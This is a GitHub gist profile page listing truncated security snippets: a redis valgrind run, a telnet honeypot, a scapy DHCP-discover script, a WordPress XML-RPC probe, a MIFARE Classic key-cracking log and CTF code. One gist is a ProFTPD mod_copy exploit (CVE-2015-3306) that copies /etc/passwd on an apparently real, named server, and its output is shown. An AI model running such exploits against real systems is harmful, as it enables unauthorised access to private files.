Skip to content

Instantly share code, notes, and snippets.

View toufik-airane's full-sized avatar

Toufik Airane toufik-airane

View GitHub Profile
root@kali:~/Documents/redis-3.0.4# valgrind -v --trace-children=yes --leak-check=full ./src/redis-server
==64442== Memcheck, a memory error detector
==64442== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==64442== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info
==64442== Command: ./src/redis-server
==64442==
--64442-- Valgrind options:
--64442-- -v
--64442-- --trace-children=yes
--64442-- --leak-check=full
from bs4 import BeautifulSoup
import urllib2
import re
soup = BeautifulSoup(urllib2.urlopen("http://redis.io/commands"), 'html.parser')
for b in soup.find_all('span', class_='command'):
print b.contents[0].strip()
#!/usr/bin/python
import capstone
import re
import sys
from ptrace.debugger import *
from capstone import *
class Page():
def __init__(self, start, end, flags, name):
self.start = int(start, 16)
from twisted.internet import protocol, reactor
from twisted.manhole.telnet import Shell, ShellFactory
from twisted.protocols.telnet import Telnet
class HoneyProtocol(Shell):
def __init__(self):
None
def welcomeMessage(self):
#!/usr/bin/python
from scapy.all import *
import threading
def sendp_dhcp_discover():
conf.checkIPaddr = False
fam,hw = get_if_raw_hwaddr(conf.iface)
dhcp_p_discover = Ether(dst="ff:ff:ff:ff:ff:ff")/ \
IP(src="0.0.0.0",dst="255.255.255.255")/ \
@toufik-airane
toufik-airane / 3306.sh
Last active October 30, 2016 18:30
CVE-2015-3306
# ProFTPD mod_copy Information Disclosure CVE-2015-3306
echo -e "SITE CPFR /etc/passwd\r\nSITE CPTO /tmp/passwd.tmp\r\nQUIT\r\n" | netcat cpc-prod11.canardpc.com 21
~> INPUT
#SITE CPFR /etc/passwd
#SITE CPTO /var/www/passwd.tmp
#QUIT
~> OUTPUT
#220 ProFTPD 1.3.4a Server (Debian)
@toufik-airane
toufik-airane / system.listMethods
Last active December 17, 2015 22:14
Wordpress XMLRPC
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
- - -
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<params>
<param>
<value>
atualizaApp = new UpdateApp();
atualizaApp.setContext(getApplicationContext());
atualizaApp.execute("http://serverurl/appfile.apk");
public class UpdateApp extends AsyncTask<String,Void,Void>{
private Context context;
public void setContext(Context contextf){
context = contextf;
}
@toufik-airane
toufik-airane / nespresso1.log
Last active June 21, 2020 16:51
MIFARE Classic
MacBook-Pro-de-Toufik$ mfoc -O nespresso1.mkd
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): bc 41 9f 60
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
@toufik-airane
toufik-airane / LeetMaze.py
Last active January 3, 2017 14:10
Hack Dat Kiwi CTF 2015 (https://hack.dat.kiwi)
#!/usr/bin/python
# Leet Maze (Forensics)
import dns.resolver
import re
r = dns.resolver.Resolver()
r.nameservers = ['207.244.97.182']
r.configure = False
def query(n, l):